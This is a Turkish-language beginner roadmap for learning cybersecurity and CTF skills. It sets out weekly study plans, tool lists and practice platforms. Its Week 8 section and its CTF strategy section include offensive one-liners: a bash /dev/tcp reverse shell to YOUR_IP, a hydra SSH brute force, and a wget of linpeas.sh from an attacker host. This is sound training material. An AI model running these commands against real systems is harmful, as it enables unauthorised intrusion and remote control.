🌱 ROADMAP: Yeni Başlayanlar (0-6 Ay)
"Büyük hedefler küçük adımlarla başlar."
📋 İçindekiler
- Giriş
- Ön Koşullar
- Karar Ağacı
- Detaylı Öğrenme Yolu
- Haftalık Plan
- İlk CTF Çözüm Stratejisi
- Yaygın Hatalar
🎯 Giriş
Bu roadmap, siber güvenlik ve CTF dünyasına yeni başlayanlar için hazırlanmıştır.
🎓 Bu Seviyede Kazanacaklarınız
TEXT
✅ Linux komut satırını rahatça kullanabilme
✅ Temel ağ (network) kavramlarını anlama
✅ Nmap, Gobuster gibi temel araçları kullanabilme
✅ TryHackMe/HackTheBox Easy makineleri çözebilme
✅ Basit web güvenlik açıklarını bulabilme
✅ Reverse shell alabilme ve temel privesc yapabilme⏱️ Tahmini Süre
3-6 ay (haftada 10-15 saat çalışma ile)
🗺️ Karar Ağacı
TEXT
Siber Güvenliğe Başlamak İstiyorum
│
├─► Bilgisayar bilgim var mı?
│ │
│ No ──► 📖 guides/00_fundamentals/computer_basics_guide.md
│ │ └─► Konular: Dosya sistemi, süreçler, ağ temelleri
│ │ └─► Pratik: Windows/Linux'ta dosya işlemleri
│ │ └─► Süre: 1 hafta
│ │ └─► ✅ Anladım → Devam et
│ │
│ Yes
│ │
├─► Linux kullanabiliyor muyum?
│ │
│ No ──► 📖 guides/00_fundamentals/linux_basics_guide.md
│ │ └─► Konular: Temel komutlar, dosya izinleri
│ │ └─► 📖 guides/00_starter_pack/ctf_kali_optimizasyon.md
│ │ └─► Süre: 2 hafta
│ │ └─► ✅ Terminal rahat mı? → Devam et
│ │
│ Yes
│ │
├─► Ağ (Network) bilgim var mı?
│ │
│ No ──► 📖 guides/00_fundamentals/networking_101_guide.md
│ │ └─► 📖 guides/00_fundamentals/tcp_ip_part1.md
│ │ └─► 📖 guides/00_fundamentals/tcp_ip_part2.md
│ │ └─► Süre: 1-2 hafta
│ │ └─► ✅ IP/Port anladım → Devam et
│ │
│ Yes
│ │
├─► Lab ortamım hazır mı?
│ │
│ No ──► 📖 guides/00_baslangic/lab_ortami_kurulum.md
│ │ └─► VirtualBox + Kali Linux + VPN
│ │ └─► Süre: 1 gün
│ │ └─► ✅ Lab çalışıyor → Devam et
│ │
│ Yes
│ │
├─► Yasal/Etik bilgim var mı?
│ │
│ No ──► 📖 guides/00_baslangic/yasal_etik_cerceve.md
│ │ └─► ⚠️ MUTLAKA OKUYUN!
│ │ └─► Süre: 30 dakika
│ │
│ Yes
│ │
└─► ✅ TEMELLERİ TAMAMLADIM!
│
▼
┌─────────────────────────────┐
│ İLK ARAÇLARI ÖĞREN │
└─────────────────────────────┘
│
├─► 1️⃣ NMAP (Port Tarama)
│ │
│ ├─► 📖 guides/02_recon_enumeration/port_tarama/nmap.md
│ ├─► 📄 cheatsheets/phase_1_critical_basics/nmap_quick_reference.md
│ └─► Pratik: scanme.nmap.org tara
│ └─► Süre: 3-4 gün
│
├─► 2️⃣ Directory Brute Force
│ │
│ ├─► 📄 cheatsheets/phase_1/gobuster_dirb_dirsearch.md
│ ├─► 📖 guides/00_starter_pack/ctf_wordlists_rehberi.md
│ └─► Pratik: DVWA'da dizin tarama
│ └─► Süre: 2-3 gün
│
├─► 3️⃣ Burp Suite
│ │
│ ├─► 📄 cheatsheets/phase_8/burp_suite_cheatsheet.md
│ └─► Pratik: HTTP request yakala ve değiştir
│ └─► Süre: 3-4 gün
│
├─► 4️⃣ Reverse Shell
│ │
│ ├─► 📖 guides/04_exploitation_payloads/shells_guide.md
│ ├─► 📄 cheatsheets/phase_1/reverse_shells_cheatsheet.md
│ └─► Pratik: nc listener + shell gönder
│ └─► Süre: 2-3 gün
│
├─► 5️⃣ Hash Cracking
│ │
│ ├─► 📄 cheatsheets/phase_6/john_ripper_cheatsheet.md
│ └─► Pratik: John/Hashcat ile hash kır
│ └─► Süre: 2-3 gün
│
└─► ✅ TEMEL ARAÇLARI ÖĞRENDİM!
│
▼
┌─────────────────────────────┐
│ İLK CTF'İNİ ÇÖZ │
└─────────────────────────────┘
│
├─► Örnek senaryoları çalış
│ └─► 📖 writeups/ornek_senaryolar/ornek1_sql_injection.md
│ └─► 📖 writeups/ornek_senaryolar/ornek2_wordpress_rce.md
│
├─► TryHackMe Easy Rooms
│ └─► Basic Pentesting, Ignite, Kenobi
│
└─► HackTheBox Easy Machines
└─► Lame, Legacy, Blue
│
▼
┌─────────────────────────────┐
│ ORTAYseviye HAZIR! │
└─────────────────────────────┘
│
└─► 🚀 roadmap_orta_seviye.md dosyasına geç!📚 Detaylı Öğrenme Yolu
Faz 1: Temeller (Hafta 1-4)
Hafta 1: Sistem Temelleri
TEXT
Gün 1-2: 📖 guides/00_fundamentals/computer_basics_guide.md
Gün 3-4: Lab kurulumu
Gün 5-7: 📖 guides/00_fundamentals/linux_basics_guide.md
Pratik:
• ls, cd, cat, grep komutlarını öğren
• chmod, chown ile dosya izinleri
• find ile dosya aramaHafta 2: Ağ Temelleri
TEXT
Gün 1-3: 📖 guides/00_fundamentals/networking_101_guide.md
Gün 4-5: 📖 guides/00_fundamentals/tcp_ip_part1.md
Gün 6-7: Ağ komutları (ping, netstat, traceroute)Hafta 3: Web Temelleri
TEXT
Gün 1-3: 📖 guides/00_fundamentals/web_basics_p1_guide.md
Gün 4-5: 📖 guides/00_fundamentals/http_protocols_guide.md
Gün 6-7: Browser DevToolsHafta 4: Programming Basics
TEXT
Gün 1-4: 📖 guides/00_fundamentals/programming_basics.md
Gün 5-7: 📖 guides/00_fundamentals/programming_basics_part2.mdFaz 2: İlk Araçlar (Hafta 5-8)
Hafta 5: Nmap
TEXT
📖 guides/02_recon_enumeration/port_tarama/nmap.md
📄 cheatsheets/phase_1_critical_basics/nmap_quick_reference.md
Komutlar:
nmap -sV -sC <IP>
nmap -p- <IP>
nmap -A <IP>Hafta 6: Directory Brute Force
TEXT
📄 cheatsheets/phase_1/gobuster_dirb_dirsearch.md
Komutlar:
gobuster dir -u http://<IP> -w wordlist.txt
ffuf -u http://<IP>/FUZZ -w wordlist.txtHafta 7: Burp Suite & Web Exploitation
TEXT
📄 cheatsheets/phase_8/burp_suite_cheatsheet.md
📖 guides/03_web_exploitation/web_exploitation.md
Pratik: DVWA kurulumu ve testHafta 8: Reverse Shells
TEXT
📖 guides/04_exploitation_payloads/shells_guide.md
📄 cheatsheets/phase_1/reverse_shells_cheatsheet.md
Komutlar:
nc -lvnp 4444
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1Faz 3: İlk CTF (Hafta 9-12)
Hafta 9-10: Örnek Senaryolar
TEXT
📖 writeups/ornek_senaryolar/ (tüm dosyalar)Hafta 11: TryHackMe Easy Rooms
TEXT
• Basic Pentesting
• Ignite
• Kenobi
• Brooklyn Nine NineHafta 12: HackTheBox
TEXT
• Lame
• Legacy
• Blue📅 Haftalık Plan Önerisi
TEXT
Pazartesi: Yeni rehber oku (1-2 saat)
Salı: Lab'da pratik (2-3 saat)
Çarşamba: CTF dene (2-3 saat)
Perşembe: Cheatsheet + notlar (1 saat)
Cuma: Tekrar (1-2 saat)
Hafta Sonu: CTF challenge + writeup (3-4 saat)
⏱️ Toplam: 10-15 saat/hafta🎯 İlk CTF Çözüm Stratejisi
TEXT
1. ENUMERATION
└─► Nmap: nmap -p- -sV -sC <IP>
└─► Web: gobuster dir -u http://<IP> -w wordlist
└─► SMB: enum4linux -a <IP>
2. INITIAL ACCESS
└─► Exploit ara: searchsploit <service>
└─► Web zafiyeti: SQL Injection, Command Injection
└─► Brute force: hydra -l user -P pass.txt ssh://<IP>
3. SHELL STABILIZE
└─► python -c 'import pty;pty.spawn("/bin/bash")'
└─► export TERM=xterm
4. PRIVILEGE ESCALATION
└─► LinPEAS: wget http://YOUR_IP/linpeas.sh
└─► Manuel: sudo -l, SUID, cron
5. ROOT!
└─► cat /root/root.txt⚠️ Yaygın Hatalar
❌ Hata 1: Çok Hızlı İlerleme
TEXT
Yanlış: "1 ayda her şeyi öğreneyim"
Doğru: "Her konuyu öğrenip pratik yapayım"❌ Hata 2: Pratik Yapmama
TEXT
Yanlış: Sadece okumak
Doğru: Her konuda lab'da deneme yapmak❌ Hata 3: Not Almama
TEXT
Yanlış: Aklımda tutmaya çalışmak
Doğru: Sistematik not alma❌ Hata 4: Hemen Writeup'a Bakmak
TEXT
Yanlış: 5 dk sonra writeup okumak
Doğru: En az 30-60 dk uğraşmak✅ Seviye Tamamlama Kriterleri
Bu kriterleri sağladıysanız orta seviyeye geçebilirsiniz:
TEXT
□ Linux terminal'i rahatça kullanıyorum
□ Nmap ile full port taraması yapabiliyorum
□ Gobuster/Ffuf ile directory scan yapabiliyorum
□ Burp Suite'te request intercept edebiliyorum
□ Reverse shell alabiliyorum
□ Shell'i stabilize edebiliyorum
□ TryHackMe'de 10+ Easy room çözdüm
□ HackTheBox'ta 3+ Easy machine çözdüm
□ Temel web zafiyetlerini (SQLi, XSS) biliyorum
□ John/Hashcat ile hash kırabiliyorum8+ işaret: ✅ Orta seviyeye geçebilirsiniz!
5-7 işaret: ⚠️ Biraz daha pratik yapın
0-4 işaret: ❌ Bu seviyeye devam edin
🎯 Bir Sonraki Adım
✅ Kriterleri sağladıysanız:
➡️ roadmap_orta_seviye.md dosyasına geçin!
Başarılar! 🚀